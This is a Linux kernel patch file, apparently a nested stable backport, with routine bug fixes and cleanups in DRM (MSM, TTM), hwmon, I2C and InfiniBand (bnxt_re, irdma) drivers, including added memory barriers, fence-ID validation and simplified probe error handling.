+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 0829eaf2cd4e8..895a0e9db1f09 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -89,7 +89,7 @@ static void a5xx_submit_in_rb(struct msm_gpu *gpu, struct msm_gem_submit *submit
+ 			 * since we've already mapped it once in
+ 			 * submit_reloc()
+ 			 */
+-			if (WARN_ON(!ptr))
++			if (WARN_ON(IS_ERR_OR_NULL(ptr)))
+ 				return;
+ 
+ 			for (i = 0; i < dwords; i++) {
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.h b/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.h
+index 2fb58b7098e4b..3bd2065a9d30e 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.h
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.h
+@@ -200,7 +200,7 @@ static const struct a6xx_shader_block {
+ 	SHADER(A6XX_SP_LB_3_DATA, 0x800),
+ 	SHADER(A6XX_SP_LB_4_DATA, 0x800),
+ 	SHADER(A6XX_SP_LB_5_DATA, 0x200),
+-	SHADER(A6XX_SP_CB_BINDLESS_DATA, 0x2000),
++	SHADER(A6XX_SP_CB_BINDLESS_DATA, 0x800),
+ 	SHADER(A6XX_SP_CB_LEGACY_DATA, 0x280),
+ 	SHADER(A6XX_SP_UAV_DATA, 0x80),
+ 	SHADER(A6XX_SP_INST_TAG, 0x80),
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_core_perf.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_core_perf.h
+index e3795995e1454..29bb8ee2bc266 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_core_perf.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_core_perf.h
+@@ -14,19 +14,6 @@
+ 
+ #define	DPU_PERF_DEFAULT_MAX_CORE_CLK_RATE	412500000
+ 
+-/**
+- * enum dpu_core_perf_data_bus_id - data bus identifier
+- * @DPU_CORE_PERF_DATA_BUS_ID_MNOC: DPU/MNOC data bus
+- * @DPU_CORE_PERF_DATA_BUS_ID_LLCC: MNOC/LLCC data bus
+- * @DPU_CORE_PERF_DATA_BUS_ID_EBI: LLCC/EBI data bus
+- */
+-enum dpu_core_perf_data_bus_id {
+-	DPU_CORE_PERF_DATA_BUS_ID_MNOC,
+-	DPU_CORE_PERF_DATA_BUS_ID_LLCC,
+-	DPU_CORE_PERF_DATA_BUS_ID_EBI,
+-	DPU_CORE_PERF_DATA_BUS_ID_MAX,
+-};
+-
+ /**
+  * struct dpu_core_perf_params - definition of performance parameters
+  * @max_per_pipe_ib: maximum instantaneous bandwidth request
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index ac3d1d492a48c..f982a827be7ca 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -932,13 +932,11 @@ static int wait_fence(struct msm_gpu_submitqueue *queue, uint32_t fence_id,
+ 	 * retired, so if the fence is not found it means there is nothing
+ 	 * to wait for
+ 	 */
+-	ret = mutex_lock_interruptible(&queue->idr_lock);
+-	if (ret)
+-		return ret;
++	spin_lock(&queue->idr_lock);
+ 	fence = idr_find(&queue->fence_idr, fence_id);
+ 	if (fence)
+ 		fence = dma_fence_get_rcu(fence);
+-	mutex_unlock(&queue->idr_lock);
++	spin_unlock(&queue->idr_lock);
+ 
+ 	if (!fence)
+ 		return 0;
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index d6162561141c5..c12a6ac2d3840 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -72,9 +72,9 @@ void __msm_gem_submit_destroy(struct kref *kref)
+ 	unsigned i;
+ 
+ 	if (submit->fence_id) {
+-		mutex_lock(&submit->queue->idr_lock);
++		spin_lock(&submit->queue->idr_lock);
+ 		idr_remove(&submit->queue->fence_idr, submit->fence_id);
+-		mutex_unlock(&submit->queue->idr_lock);
++		spin_unlock(&submit->queue->idr_lock);
+ 	}
+ 
+ 	dma_fence_put(submit->user_fence);
+@@ -866,7 +866,7 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 
+ 	submit->nr_cmds = i;
+ 
+-	mutex_lock(&queue->idr_lock);
++	spin_lock(&queue->idr_lock);
+ 
+ 	/*
+ 	 * If using userspace provided seqno fence, validate that the id
+@@ -875,8 +875,8 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 	 * after the job is armed
+ 	 */
+ 	if ((args->flags & MSM_SUBMIT_FENCE_SN_IN) &&
+-			idr_find(&queue->fence_idr, args->fence)) {
+-		mutex_unlock(&queue->idr_lock);
++			(!args->fence || idr_find(&queue->fence_idr, args->fence))) {
++		spin_unlock(&queue->idr_lock);
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+@@ -910,7 +910,7 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 						    INT_MAX, GFP_KERNEL);
+ 	}
+ 
+-	mutex_unlock(&queue->idr_lock);
++	spin_unlock(&queue->idr_lock);
+ 
+ 	if (submit->fence_id < 0) {
+ 		ret = submit->fence_id;
+diff --git a/drivers/gpu/drm/msm/msm_gpu.h b/drivers/gpu/drm/msm/msm_gpu.h
+index 732295e256834..b39cd332751dc 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.h
++++ b/drivers/gpu/drm/msm/msm_gpu.h
+@@ -500,7 +500,7 @@ struct msm_gpu_submitqueue {
+ 	struct msm_file_private *ctx;
+ 	struct list_head node;
+ 	struct idr fence_idr;
+-	struct mutex idr_lock;
++	struct spinlock idr_lock;
+ 	struct mutex lock;
+ 	struct kref ref;
+ 	struct drm_sched_entity *entity;
+diff --git a/drivers/gpu/drm/msm/msm_submitqueue.c b/drivers/gpu/drm/msm/msm_submitqueue.c
+index c6929e205b511..0e803125a325a 100644
+--- a/drivers/gpu/drm/msm/msm_submitqueue.c
++++ b/drivers/gpu/drm/msm/msm_submitqueue.c
+@@ -200,7 +200,7 @@ int msm_submitqueue_create(struct drm_device *drm, struct msm_file_private *ctx,
+ 		*id = queue->id;
+ 
+ 	idr_init(&queue->fence_idr);
+-	mutex_init(&queue->idr_lock);
++	spin_lock_init(&queue->idr_lock);
+ 	mutex_init(&queue->lock);
+ 
+ 	list_add_tail(&queue->node, &ctx->submitqueues);
+diff --git a/drivers/gpu/drm/ttm/ttm_bo.c b/drivers/gpu/drm/ttm/ttm_bo.c
+index f2c4e9037d6e0..f7aeeee6f5266 100644
+--- a/drivers/gpu/drm/ttm/ttm_bo.c
++++ b/drivers/gpu/drm/ttm/ttm_bo.c
+@@ -499,17 +499,18 @@ static int ttm_bo_evict(struct ttm_buffer_object *bo,
+ 		goto out;
+ 	}
+ 
+-bounce:
+-	ret = ttm_bo_handle_move_mem(bo, evict_mem, true, ctx, &hop);
+-	if (ret == -EMULTIHOP) {
++	do {
++		ret = ttm_bo_handle_move_mem(bo, evict_mem, true, ctx, &hop);
++		if (ret != -EMULTIHOP)
++			break;
++
+ 		ret = ttm_bo_bounce_temp_buffer(bo, &evict_mem, ctx, &hop);
+-		if (ret) {
++	} while (!ret);
++
++	if (ret) {
++		ttm_resource_free(bo, &evict_mem);
++		if (ret != -ERESTARTSYS && ret != -EINTR)
+ 			pr_err("Buffer eviction failed\n");
+-			ttm_resource_free(bo, &evict_mem);
+-			goto out;
+-		}
+-		/* try and move to final place now. */
+-		goto bounce;
+ 	}
+ out:
+ 	return ret;
+@@ -549,6 +550,12 @@ static bool ttm_bo_evict_swapout_allowable(struct ttm_buffer_object *bo,
+ {
+ 	bool ret = false;
+ 
++	if (bo->pin_count) {
++		*locked = false;
++		*busy = false;
++		return false;
++	}
++
+ 	if (bo->base.resv == ctx->resv) {
+ 		dma_resv_assert_held(bo->base.resv);
+ 		if (ctx->allow_res_evict)
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index 823d0ca1d6059..43aa955ec120d 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -77,6 +77,13 @@ static DEFINE_MUTEX(nb_smu_ind_mutex);
+ #define ZEN_CUR_TEMP_RANGE_SEL_MASK		BIT(19)
+ #define ZEN_CUR_TEMP_TJ_SEL_MASK		GENMASK(17, 16)
+ 
++/*
++ * AMD's Industrial processor 3255 supports temperature from -40 deg to 105 deg Celsius.
++ * Use the model name to identify 3255 CPUs and set a flag to display negative temperature.
++ * Do not round off to zero for negative Tctl or Tdie values if the flag is set
++ */
++#define AMD_I3255_STR				"3255"
++
+ struct k10temp_data {
+ 	struct pci_dev *pdev;
+ 	void (*read_htcreg)(struct pci_dev *pdev, u32 *regval);
+@@ -86,6 +93,7 @@ struct k10temp_data {
+ 	u32 show_temp;
+ 	bool is_zen;
+ 	u32 ccd_offset;
++	bool disp_negative;
+ };
+ 
+ #define TCTL_BIT	0
+@@ -204,12 +212,12 @@ static int k10temp_read_temp(struct device *dev, u32 attr, int channel,
+ 		switch (channel) {
+ 		case 0:		/* Tctl */
+ 			*val = get_raw_temp(data);
+-			if (*val < 0)
++			if (*val < 0 && !data->disp_negative)
+ 				*val = 0;
+ 			break;
+ 		case 1:		/* Tdie */
+ 			*val = get_raw_temp(data) - data->temp_offset;
+-			if (*val < 0)
++			if (*val < 0 && !data->disp_negative)
+ 				*val = 0;
+ 			break;
+ 		case 2 ... 13:		/* Tccd{1-12} */
+@@ -405,6 +413,11 @@ static int k10temp_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	data->pdev = pdev;
+ 	data->show_temp |= BIT(TCTL_BIT);	/* Always show Tctl */
+ 
++	if (boot_cpu_data.x86 == 0x17 &&
++	    strstr(boot_cpu_data.x86_model_id, AMD_I3255_STR)) {
++		data->disp_negative = true;
++	}
++
+ 	if (boot_cpu_data.x86 == 0x15 &&
+ 	    ((boot_cpu_data.x86_model & 0xf0) == 0x60 ||
+ 	     (boot_cpu_data.x86_model & 0xf0) == 0x70)) {
+diff --git a/drivers/hwmon/nct7802.c b/drivers/hwmon/nct7802.c
+index a175f8283695e..e64c12d90a042 100644
+--- a/drivers/hwmon/nct7802.c
++++ b/drivers/hwmon/nct7802.c
+@@ -725,7 +725,7 @@ static umode_t nct7802_temp_is_visible(struct kobject *kobj,
+ 	if (index >= 38 && index < 46 && !(reg & 0x01))		/* PECI 0 */
+ 		return 0;
+ 
+-	if (index >= 0x46 && (!(reg & 0x02)))			/* PECI 1 */
++	if (index >= 46 && !(reg & 0x02))			/* PECI 1 */
+ 		return 0;
+ 
+ 	return attr->mode;
+diff --git a/drivers/i2c/busses/i2c-ibm_iic.c b/drivers/i2c/busses/i2c-ibm_iic.c
+index eeb80e34f9ad7..de3b609515e08 100644
+--- a/drivers/i2c/busses/i2c-ibm_iic.c
++++ b/drivers/i2c/busses/i2c-ibm_iic.c
+@@ -694,10 +694,8 @@ static int iic_probe(struct platform_device *ofdev)
+ 	int ret;
+ 
+ 	dev = kzalloc(sizeof(*dev), GFP_KERNEL);
+-	if (!dev) {
+-		dev_err(&ofdev->dev, "failed to allocate device data\n");
++	if (!dev)
+ 		return -ENOMEM;
+-	}
+ 
+ 	platform_set_drvdata(ofdev, dev);
+ 
+diff --git a/drivers/i2c/busses/i2c-nomadik.c b/drivers/i2c/busses/i2c-nomadik.c
+index a2d12a5b1c34c..9c5d66bd6dc1c 100644
+--- a/drivers/i2c/busses/i2c-nomadik.c
++++ b/drivers/i2c/busses/i2c-nomadik.c
+@@ -970,12 +970,10 @@ static int nmk_i2c_probe(struct amba_device *adev, const struct amba_id *id)
+ 	struct i2c_vendor_data *vendor = id->data;
+ 	u32 max_fifo_threshold = (vendor->fifodepth / 2) - 1;
+ 
+-	dev = devm_kzalloc(&adev->dev, sizeof(struct nmk_i2c_dev), GFP_KERNEL);
+-	if (!dev) {
+-		dev_err(&adev->dev, "cannot allocate memory\n");
+-		ret = -ENOMEM;
+-		goto err_no_mem;
+-	}
++	dev = devm_kzalloc(&adev->dev, sizeof(*dev), GFP_KERNEL);
++	if (!dev)
++		return -ENOMEM;
++
+ 	dev->vendor = vendor;
+ 	dev->adev = adev;
+ 	nmk_i2c_of_probe(np, dev);
+@@ -996,30 +994,21 @@ static int nmk_i2c_probe(struct amba_device *adev, const struct amba_id *id)
+ 
+ 	dev->virtbase = devm_ioremap(&adev->dev, adev->res.start,
+ 				resource_size(&adev->res));
+-	if (!dev->virtbase) {
+-		ret = -ENOMEM;
+-		goto err_no_mem;
+-	}
++	if (!dev->virtbase)
++		return -ENOMEM;
+ 
+ 	dev->irq = adev->irq[0];
+ 	ret = devm_request_irq(&adev->dev, dev->irq, i2c_irq_handler, 0,
+ 				DRIVER_NAME, dev);
+ 	if (ret) {
+ 		dev_err(&adev->dev, "cannot claim the irq %d\n", dev->irq);
+-		goto err_no_mem;
++		return ret;
+ 	}
+ 
+-	dev->clk = devm_clk_get(&adev->dev, NULL);
++	dev->clk = devm_clk_get_enabled(&adev->dev, NULL);
+ 	if (IS_ERR(dev->clk)) {
+-		dev_err(&adev->dev, "could not get i2c clock\n");
+-		ret = PTR_ERR(dev->clk);
+-		goto err_no_mem;
+-	}
+-
+-	ret = clk_prepare_enable(dev->clk);
+-	if (ret) {
+-		dev_err(&adev->dev, "can't prepare_enable clock\n");
+-		goto err_no_mem;
++		dev_err(&adev->dev, "could enable i2c clock\n");
++		return PTR_ERR(dev->clk);
+ 	}
+ 
+ 	init_hw(dev);
+@@ -1042,22 +1031,15 @@ static int nmk_i2c_probe(struct amba_device *adev, const struct amba_id *id)
+ 
+ 	ret = i2c_add_adapter(adap);
+ 	if (ret)
+-		goto err_no_adap;
++		return ret;
+ 
+ 	pm_runtime_put(&adev->dev);
+ 
+ 	return 0;
+-
+- err_no_adap:
+-	clk_disable_unprepare(dev->clk);
+- err_no_mem:
+-
+-	return ret;
+ }
+ 
+ static void nmk_i2c_remove(struct amba_device *adev)
+ {
+-	struct resource *res = &adev->res;
+ 	struct nmk_i2c_dev *dev = amba_get_drvdata(adev);
+ 
+ 	i2c_del_adapter(&dev->adap);
+@@ -1066,8 +1048,6 @@ static void nmk_i2c_remove(struct amba_device *adev)
+ 	clear_all_interrupts(dev);
+ 	/* disable the controller */
+ 	i2c_clr_bit(dev->virtbase + I2C_CR, I2C_CR_PE);
+-	clk_disable_unprepare(dev->clk);
+-	release_mem_region(res->start, resource_size(res));
+ }
+ 
+ static struct i2c_vendor_data vendor_stn8815 = {
+diff --git a/drivers/i2c/busses/i2c-sh7760.c b/drivers/i2c/busses/i2c-sh7760.c
+index 319d1fa617c88..051b904cb35f6 100644
+--- a/drivers/i2c/busses/i2c-sh7760.c
++++ b/drivers/i2c/busses/i2c-sh7760.c
+@@ -443,9 +443,8 @@ static int sh7760_i2c_probe(struct platform_device *pdev)
+ 		goto out0;
+ 	}
+ 
+-	id = kzalloc(sizeof(struct cami2c), GFP_KERNEL);
++	id = kzalloc(sizeof(*id), GFP_KERNEL);
+ 	if (!id) {
+-		dev_err(&pdev->dev, "no mem for private data\n");
+ 		ret = -ENOMEM;
+ 		goto out0;
+ 	}
+diff --git a/drivers/i2c/busses/i2c-tiny-usb.c b/drivers/i2c/busses/i2c-tiny-usb.c
+index 7279ca0eaa2d0..d1fa9ff5aeab4 100644
+--- a/drivers/i2c/busses/i2c-tiny-usb.c
++++ b/drivers/i2c/busses/i2c-tiny-usb.c
+@@ -226,10 +226,8 @@ static int i2c_tiny_usb_probe(struct usb_interface *interface,
+ 
+ 	/* allocate memory for our device state and initialize it */
+ 	dev = kzalloc(sizeof(*dev), GFP_KERNEL);
+-	if (dev == NULL) {
+-		dev_err(&interface->dev, "Out of memory\n");
++	if (!dev)
+ 		goto error;
+-	}
+ 
+ 	dev->usb_dev = usb_get_dev(interface_to_usbdev(interface));
+ 	dev->interface = interface;
+diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+index 94222de1d3719..4ed8814efde6f 100644
+--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
++++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+@@ -796,7 +796,10 @@ fail:
+ int bnxt_re_destroy_qp(struct ib_qp *ib_qp, struct ib_udata *udata)
+ {
+ 	struct bnxt_re_qp *qp = container_of(ib_qp, struct bnxt_re_qp, ib_qp);
++	struct bnxt_qplib_qp *qplib_qp = &qp->qplib_qp;
+ 	struct bnxt_re_dev *rdev = qp->rdev;
++	struct bnxt_qplib_nq *scq_nq = NULL;
++	struct bnxt_qplib_nq *rcq_nq = NULL;
+ 	unsigned int flags;
+ 	int rc;
+ 
+@@ -830,6 +833,15 @@ int bnxt_re_destroy_qp(struct ib_qp *ib_qp, struct ib_udata *udata)
+ 	ib_umem_release(qp->rumem);
+ 	ib_umem_release(qp->sumem);
+ 
++	/* Flush all the entries of notification queue associated with
++	 * given qp.
++	 */
++	scq_nq = qplib_qp->scq->nq;
++	rcq_nq = qplib_qp->rcq->nq;
++	bnxt_re_synchronize_nq(scq_nq);
++	if (scq_nq != rcq_nq)
++		bnxt_re_synchronize_nq(rcq_nq);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.c b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+index 74d56900387a1..1011293547ef7 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+@@ -387,6 +387,24 @@ static void bnxt_qplib_service_nq(struct tasklet_struct *t)
+ 	spin_unlock_bh(&hwq->lock);
+ }
+ 
++/* bnxt_re_synchronize_nq - self polling notification queue.
++ * @nq      -     notification queue pointer
++ *
++ * This function will start polling entries of a given notification queue
++ * for all pending  entries.
++ * This function is useful to synchronize notification entries while resources
++ * are going away.
++ */
++
++void bnxt_re_synchronize_nq(struct bnxt_qplib_nq *nq)
++{
++	int budget = nq->budget;
++
++	nq->budget = nq->hwq.max_elements;
++	bnxt_qplib_service_nq(&nq->nq_tasklet);
++	nq->budget = budget;
++}
++
+ static irqreturn_t bnxt_qplib_nq_irq(int irq, void *dev_instance)
+ {
+ 	struct bnxt_qplib_nq *nq = dev_instance;
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.h b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+index f859710f9a7f4..49d89c0808275 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.h
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+@@ -548,6 +548,7 @@ int bnxt_qplib_process_flush_list(struct bnxt_qplib_cq *cq,
+ 				  struct bnxt_qplib_cqe *cqe,
+ 				  int num_cqes);
+ void bnxt_qplib_flush_cqn_wq(struct bnxt_qplib_qp *qp);
++void bnxt_re_synchronize_nq(struct bnxt_qplib_nq *nq);
+ 
+ static inline void *bnxt_qplib_get_swqe(struct bnxt_qplib_q *que, u32 *swq_idx)
+ {
+diff --git a/drivers/infiniband/hw/irdma/ctrl.c b/drivers/infiniband/hw/irdma/ctrl.c
+index a41e0d21143ae..6544c9c60b7db 100644
+--- a/drivers/infiniband/hw/irdma/ctrl.c
++++ b/drivers/infiniband/hw/irdma/ctrl.c
+@@ -2693,13 +2693,13 @@ static int irdma_sc_cq_modify(struct irdma_sc_cq *cq,
+  */
+ void irdma_check_cqp_progress(struct irdma_cqp_timeout *timeout, struct irdma_sc_dev *dev)
+ {
+-	if (timeout->compl_cqp_cmds != dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS]) {
+-		timeout->compl_cqp_cmds = dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS];
++	u64 completed_ops = atomic64_read(&dev->cqp->completed_ops);
++
++	if (timeout->compl_cqp_cmds != completed_ops) {
++		timeout->compl_cqp_cmds = completed_ops;
+ 		timeout->count = 0;
+-	} else {
+-		if (dev->cqp_cmd_stats[IRDMA_OP_REQ_CMDS] !=
+-		    timeout->compl_cqp_cmds)
+-			timeout->count++;
++	} else if (timeout->compl_cqp_cmds != dev->cqp->requested_ops) {
++		timeout->count++;
+ 	}
+ }
+ 
+@@ -2742,7 +2742,7 @@ static int irdma_cqp_poll_registers(struct irdma_sc_cqp *cqp, u32 tail,
+ 		if (newtail != tail) {
+ 			/* SUCCESS */
+ 			IRDMA_RING_MOVE_TAIL(cqp->sq_ring);
+-			cqp->dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS]++;
++			atomic64_inc(&cqp->completed_ops);
+ 			return 0;
+ 		}
+ 		udelay(cqp->dev->hw_attrs.max_sleep_count);
+@@ -3102,8 +3102,8 @@ int irdma_sc_cqp_init(struct irdma_sc_cqp *cqp,
+ 	info->dev->cqp = cqp;
+ 
+ 	IRDMA_RING_INIT(cqp->sq_ring, cqp->sq_size);
+-	cqp->dev->cqp_cmd_stats[IRDMA_OP_REQ_CMDS] = 0;
+-	cqp->dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS] = 0;
++	cqp->requested_ops = 0;
++	atomic64_set(&cqp->completed_ops, 0);
+ 	/* for the cqp commands backlog. */
+ 	INIT_LIST_HEAD(&cqp->dev->cqp_cmd_head);
+ 
+@@ -3255,7 +3255,7 @@ __le64 *irdma_sc_cqp_get_next_send_wqe_idx(struct irdma_sc_cqp *cqp, u64 scratch
+ 	if (ret_code)
+ 		return NULL;
+ 
+-	cqp->dev->cqp_cmd_stats[IRDMA_OP_REQ_CMDS]++;
++	cqp->requested_ops++;
+ 	if (!*wqe_idx)
+ 		cqp->polarity = !cqp->polarity;
+ 	wqe = cqp->sq_base[*wqe_idx].elem;
+@@ -3344,6 +3344,9 @@ int irdma_sc_ccq_get_cqe_info(struct irdma_sc_cq *ccq,
+ 	if (polarity != ccq->cq_uk.polarity)
+ 		return -ENOENT;
+ 
++	/* Ensure CEQE contents are read after valid bit is checked */
++	dma_rmb();
++
+ 	get_64bit_val(cqe, 8, &qp_ctx);
+ 	cqp = (struct irdma_sc_cqp *)(unsigned long)qp_ctx;
+ 	info->error = (bool)FIELD_GET(IRDMA_CQ_ERROR, temp);
+@@ -3378,7 +3381,7 @@ int irdma_sc_ccq_get_cqe_info(struct irdma_sc_cq *ccq,
+ 	dma_wmb(); /* make sure shadow area is updated before moving tail */
+ 
+ 	IRDMA_RING_MOVE_TAIL(cqp->sq_ring);
+-	ccq->dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS]++;
++	atomic64_inc(&cqp->completed_ops);
+ 
+ 	return ret_code;
+ }
+@@ -3990,13 +3993,17 @@ int irdma_sc_get_next_aeqe(struct irdma_sc_aeq *aeq,
+ 	u8 polarity;
+ 
+ 	aeqe = IRDMA_GET_CURRENT_AEQ_ELEM(aeq);
+-	get_64bit_val(aeqe, 0, &compl_ctx);
+ 	get_64bit_val(aeqe, 8, &temp);
+ 	polarity = (u8)FIELD_GET(IRDMA_AEQE_VALID, temp);
+ 
+ 	if (aeq->polarity != polarity)
+ 		return -ENOENT;
+ 
++	/* Ensure AEQE contents are read after valid bit is checked */
++	dma_rmb();
++
++	get_64bit_val(aeqe, 0, &compl_ctx);
++
+ 	print_hex_dump_debug("WQE: AEQ_ENTRY WQE", DUMP_PREFIX_OFFSET, 16, 8,
+ 			     aeqe, 16, false);
+ 
+diff --git a/drivers/infiniband/hw/irdma/defs.h b/drivers/infiniband/hw/irdma/defs.h
+index c1906cab5c8ad..ad54260cb58c9 100644
+--- a/drivers/infiniband/hw/irdma/defs.h
++++ b/drivers/infiniband/hw/irdma/defs.h
+@@ -190,32 +190,30 @@ enum irdma_cqp_op_type {
+ 	IRDMA_OP_MANAGE_VF_PBLE_BP		= 25,
+ 	IRDMA_OP_QUERY_FPM_VAL			= 26,
+ 	IRDMA_OP_COMMIT_FPM_VAL			= 27,
+-	IRDMA_OP_REQ_CMDS			= 28,
+-	IRDMA_OP_CMPL_CMDS			= 29,
+-	IRDMA_OP_AH_CREATE			= 30,
+-	IRDMA_OP_AH_MODIFY			= 31,
+-	IRDMA_OP_AH_DESTROY			= 32,
+-	IRDMA_OP_MC_CREATE			= 33,
+-	IRDMA_OP_MC_DESTROY			= 34,
+-	IRDMA_OP_MC_MODIFY			= 35,
+-	IRDMA_OP_STATS_ALLOCATE			= 36,
+-	IRDMA_OP_STATS_FREE			= 37,
+-	IRDMA_OP_STATS_GATHER			= 38,
+-	IRDMA_OP_WS_ADD_NODE			= 39,
+-	IRDMA_OP_WS_MODIFY_NODE			= 40,
+-	IRDMA_OP_WS_DELETE_NODE			= 41,
+-	IRDMA_OP_WS_FAILOVER_START		= 42,
+-	IRDMA_OP_WS_FAILOVER_COMPLETE		= 43,
+-	IRDMA_OP_SET_UP_MAP			= 44,
+-	IRDMA_OP_GEN_AE				= 45,
+-	IRDMA_OP_QUERY_RDMA_FEATURES		= 46,
+-	IRDMA_OP_ALLOC_LOCAL_MAC_ENTRY		= 47,
+-	IRDMA_OP_ADD_LOCAL_MAC_ENTRY		= 48,
+-	IRDMA_OP_DELETE_LOCAL_MAC_ENTRY		= 49,
+-	IRDMA_OP_CQ_MODIFY			= 50,
++	IRDMA_OP_AH_CREATE			= 28,
++	IRDMA_OP_AH_MODIFY			= 29,
++	IRDMA_OP_AH_DESTROY			= 30,
++	IRDMA_OP_MC_CREATE			= 31,
++	IRDMA_OP_MC_DESTROY			= 32,
++	IRDMA_OP_MC_MODIFY			= 33,
++	IRDMA_OP_STATS_ALLOCATE			= 34,
++	IRDMA_OP_STATS_FREE			= 35,
++	IRDMA_OP_STATS_GATHER			= 36,
++	IRDMA_OP_WS_ADD_NODE			= 37,
++	IRDMA_OP_WS_MODIFY_NODE			= 38,
++	IRDMA_OP_WS_DELETE_NODE			= 39,
++	IRDMA_OP_WS_FAILOVER_START		= 40,
++	IRDMA_OP_WS_FAILOVER_COMPLETE		= 41,
++	IRDMA_OP_SET_UP_MAP			= 42,
++	IRDMA_OP_GEN_AE				= 43,
++	IRDMA_OP_QUERY_RDMA_FEATURES		= 44,
++	IRDMA_OP_ALLOC_LOCAL_MAC_ENTRY		= 45,
++	IRDMA_OP_ADD_LOCAL_MAC_ENTRY		= 46,
++	IRDMA_OP_DELETE_LOCAL_MAC_ENTRY		= 47,
++	IRDMA_OP_CQ_MODIFY			= 48,
+ 
+ 	/* Must be last entry*/
+-	IRDMA_MAX_CQP_OPS			= 51,
++	IRDMA_MAX_CQP_OPS			= 49,
+ };
+ 
+ /* CQP SQ WQES */
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index 43dfa4761f069..c07ce85d243f1 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -191,6 +191,7 @@ static void irdma_set_flush_fields(struct irdma_sc_qp *qp,
+ 	case IRDMA_AE_AMP_MWBIND_INVALID_RIGHTS:
+ 	case IRDMA_AE_AMP_MWBIND_BIND_DISABLED:
+ 	case IRDMA_AE_AMP_MWBIND_INVALID_BOUNDS:
++	case IRDMA_AE_AMP_MWBIND_VALID_STAG:
+ 		qp->flush_code = FLUSH_MW_BIND_ERR;
+ 		qp->event_type = IRDMA_QP_EVENT_ACCESS_ERR;
+ 		break;
+@@ -2068,7 +2069,7 @@ void irdma_cqp_ce_handler(struct irdma_pci_f *rf, struct irdma_sc_cq *cq)
+ 			cqp_request->compl_info.error = info.error;
+ 
+ 			if (cqp_request->waiting) {
+-				cqp_request->request_done = true;
++				WRITE_ONCE(cqp_request->request_done, true);
+ 				wake_up(&cqp_request->waitq);
+ 				irdma_put_cqp_request(&rf->cqp, cqp_request);
+ 			} else {
+diff --git a/drivers/infiniband/hw/irdma/main.h b/drivers/infiniband/hw/irdma/main.h
+index 65e966ad34530..e64205839d039 100644
+--- a/drivers/infiniband/hw/irdma/main.h
++++ b/drivers/infiniband/hw/irdma/main.h
+@@ -159,8 +159,8 @@ struct irdma_cqp_request {
+ 	void (*callback_fcn)(struct irdma_cqp_request *cqp_request);
+ 	void *param;
+ 	struct irdma_cqp_compl_info compl_info;
++	bool request_done; /* READ/WRITE_ONCE macros operate on it */
+ 	bool waiting:1;
+-	bool request_done:1;
+ 	bool dynamic:1;
+ };
+ 
+diff --git a/drivers/infiniband/hw/irdma/puda.c b/drivers/infiniband/hw/irdma/puda.c
+index 4ec9639f1bdbf..562531712ea44 100644
+--- a/drivers/infiniband/hw/irdma/puda.c
++++ b/drivers/infiniband/hw/irdma/puda.c
+@@ -230,6 +230,9 @@ static int irdma_puda_poll_info(struct irdma_sc_cq *cq,
+ 	if (valid_bit != cq_uk->polarity)
+ 		return -ENOENT;
+ 
++	/* Ensure CQE contents are read after valid bit is checked */
++	dma_rmb();
++
+ 	if (cq->dev->hw_attrs.uk_attrs.hw_rev >= IRDMA_GEN_2)
+ 		ext_valid = (bool)FIELD_GET(IRDMA_CQ_EXTCQE, qword3);
+ 
+@@ -243,6 +246,9 @@ static int irdma_puda_poll_info(struct irdma_sc_cq *cq,
+ 		if (polarity != cq_uk->polarity)
+ 			return -ENOENT;
+ 
++		/* Ensure ext CQE contents are read after ext valid bit is checked */
++		dma_rmb();
++
+ 		IRDMA_RING_MOVE_HEAD_NOCHECK(cq_uk->cq_ring);
+ 		if (!IRDMA_RING_CURRENT_HEAD(cq_uk->cq_ring))
+ 			cq_uk->polarity = !cq_uk->polarity;
